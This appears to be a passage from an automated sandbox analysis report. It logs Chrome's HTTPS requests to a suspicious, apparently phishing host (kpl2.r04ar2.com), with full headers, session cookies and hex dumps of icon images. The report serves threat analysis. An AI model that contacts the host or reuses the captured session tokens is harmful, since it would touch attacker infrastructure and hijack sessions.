                                                          2024-08-27 22:11:11 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                          Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          61192.168.2.449848188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1501OUTGET /mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC653INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcoX1KK0f0wksBO6%2F30H%2BYorPCJ5ccs5tPcfwL7I%2F5QEmbuCoI08CozC0wLCGif8YfiABSf4kJcRAT6w%2FzBWwp1Q%2BK69MJRB3r2mwN3eZlMLRuX5tKPRK292nxFRew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655b4bbe78d3-EWR
                                                          2024-08-27 22:11:11 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                          Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.449849188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1499OUTGET /ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC651INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISEJmDruCrz0pkAbkpKA%2BeO9M7XdjB3aVo8q4Gn6NZocr%2Fk3md5lMmhk%2FXIWZWM2zKpg3C7Hf8mwtY%2B8xsnTOH%2BIX7utQ5fznHwKv3FPCIAbO05UjNKg8xZwxOqcnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655b5d2dc472-EWR
                                                          2024-08-27 22:11:11 UTC718INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                          Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31
                                                          Data Ascii: 2.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L1
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32 32 30 35 20
                                                          Data Ascii: 0.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2205
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e 36 30 30 39 20
                                                          Data Ascii: 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.6009
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32 31 2e 30 38 31
                                                          Data Ascii: 43 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 21.081
                                                          2024-08-27 22:11:11 UTC1204INData Raw: 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34 37 20 33 31 2e
                                                          Data Ascii: 7.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.7047 31.
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          63192.168.2.449850188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1517OUTGET /yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC667INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJdUFJCOu6%2B0US7UMGzBjhXhD37%2BM%2F9IS%2BNq25fIzDvTm2nHXOcXklnTfZzUOzWi7zFRlPrSDmtirI12pmbwCocEqLqTcZ4mMEiqKm604lUkMbhzW86Q396V8PzW5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655b7e060f47-EWR
                                                          2024-08-27 22:11:11 UTC702INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                          Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c
                                                          Data Ascii: 22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,
                                                          2024-08-27 22:11:11 UTC841INData Raw: 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34
                                                          Data Ascii: l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.64
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          64192.168.2.449851188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1128OUTGET /klzLXAGm0iHdZcT6MtYiHXXpKNbL5RnuklNxCudj1JkeYERYfD8sQ8Od4hrM5uv220 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
